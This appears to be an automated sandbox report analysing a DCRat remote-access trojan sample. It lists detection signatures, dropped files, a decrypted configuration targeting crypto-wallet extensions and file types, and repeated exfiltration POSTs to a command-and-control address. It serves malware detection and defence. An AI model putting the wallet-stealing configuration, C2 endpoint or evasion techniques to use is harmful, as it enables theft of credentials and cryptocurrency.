Windows Analysis Report
fDTPlvsGfH.exe

Overview

General Information

Sample name: fDTPlvsGfH.exe
renamed because original name is a hash value
Original sample name: B8298EE526BB093E3C96686D26D1361F.exe
Analysis ID: 1428989
MD5: b8298ee526bb093e3c96686d26d1361f
SHA1: 583ff162c74e864d77323b76355f175aab170e1f
SHA256: 08d8919249b3f442106283b5a413eaff6b6b3d9ca76ec7c3a88101b54bab0fe4
Tags: DCRatexe
Infos:

Detection

DCRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected DCRat
.NET source code contains potential unpacker
.NET source code contains very large strings
Adds a directory exclusion to Windows Defender
Drops PE files with benign system names
Drops executable to a common third party application directory
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: fDTPlvsGfH.exe Avira: detected
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\Desktop\GOHxPPGn.log Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\AppData\Local\Temp\46FAiS0S6O.bat Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\DSloixRU.log Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\csrss.exe Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Avira: detection malicious, Label: HEUR/AGEN.1309961
Multi AV Scanner detection for dropped file
Source: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe ReversingLabs: Detection: 78%
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe ReversingLabs: Detection: 78%
Source: C:\Recovery\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe ReversingLabs: Detection: 78%
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\csrss.exe ReversingLabs: Detection: 78%
Source: C:\Users\user\Desktop\KySWwqSG.log ReversingLabs: Detection: 66%
Source: C:\Users\user\Desktop\qZchTloU.log ReversingLabs: Detection: 66%
Source: C:\Windows\Downloaded Program Files\MoUsoCoreWorker.exe ReversingLabs: Detection: 78%
Multi AV Scanner detection for submitted file
Source: fDTPlvsGfH.exe ReversingLabs: Detection: 78%
Machine Learning detection for dropped file
Source: C:\Users\user\Desktop\DYQGISGu.log Joe Sandbox ML: detected
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\csrss.exe Joe Sandbox ML: detected
Source: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\AhGYbjHb.log Joe Sandbox ML: detected
Source: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\ICLFBdCl.log Joe Sandbox ML: detected
Source: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: fDTPlvsGfH.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: fDTPlvsGfH.exe String decryptor: {"0":[],"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"},"8c7d95c1-4def-4a0e-952b-f3c453358f2e":{"_0":"Desktop|{SYSTEMDRIVE}/Users/{USERNAME}/Desktop/|*.txt;*.cs;*.lua;*.asi;*.json;*.ini;*.word;*.xlsx;*.jpg|1000|t","_1":"Group name"},"d1159ac1-2243-45e3-9bad-55df4f7732e9":{"_0":"crypto;bank;authorization;account","_1":"1500","_2":"15","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds","_1":""}}
Source: fDTPlvsGfH.exe String decryptor: ["fexzkGy6q0p5cabyKHmX0UutTLWzT0rof1cIzvz8iKLEdDxO5xG4fc6KuDfYt8m0JAal8T9YRoyqIqQQYI3ftwIC4RYvQaOjhV4cnLPmysm1oQCDwP9kEHGX1Yqr5NI1","e32e8e8116ffca3524c66ea65e2eea691227f6f4e844f9dca8aabb77b799c790","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJeElpd2lJaXdpWlhsSmQwbHFiMmxsTVU1YVZURlNSbFJWVWxOVFZscEdabE01Vm1NeVZubGplVGhwVEVOSmVFbHFiMmxhYlVaell6SlZhVXhEU1hsSmFtOXBaRWhLTVZwVFNYTkphazFwVDJsS01HTnVWbXhKYVhkcFRrTkpOa2x1VW5sa1YxVnBURU5KTVVscWIybGtTRW94V2xOSmMwbHFXV2xQYVVvd1kyNVdiRWxwZDJsT2VVazJTVzVTZVdSWFZXbE1RMGswU1dwdmFXUklTakZhVTBselNXcHJhVTlwU2pCamJsWnNTV2wzYVUxVVFXbFBhVW93WTI1V2JFbHBkMmxOVkVWcFQybEtNR051Vm14SmFYZHBUVlJKYVU5cFNqQmpibFpzU1dsM2FVMVVUV2xQYVVvd1kyNVdiRWxwZDJsTlZGRnBUMmxLTUdOdVZteEpiakE5SWwwPSJd"]

Compliance
barindex
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Unpacked PE file: 0.2.fDTPlvsGfH.exe.2580000.4.unpack
Uses 32bit PE files
Source: fDTPlvsGfH.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Directory created: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Directory created: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\ebcca32ff60686 Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Directory created: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Directory created: C:\Program Files\Windows Portable Devices\ebcca32ff60686 Jump to behavior
Source: fDTPlvsGfH.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: eC:/Users/user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: xC:/Users/user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: |C:/Users/user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: gC:/Users/user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ~C:/Users/user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: yC:/Users/user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: mC:/Users/user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: }C:/Users/user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wC:/Users/user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: vC:/Users/user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000003796000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: kC:/Users/user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000003796000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Code function: 4x nop then jmp 00007FFD9B8BDFC6h 0_2_00007FFD9B8BDDAD

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49730 -> 109.107.182.145:80
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEPORT-TV-ASRU TELEPORT-TV-ASRU
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 384Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2564Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 384Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 1440Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2144Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2144Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2144Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continue
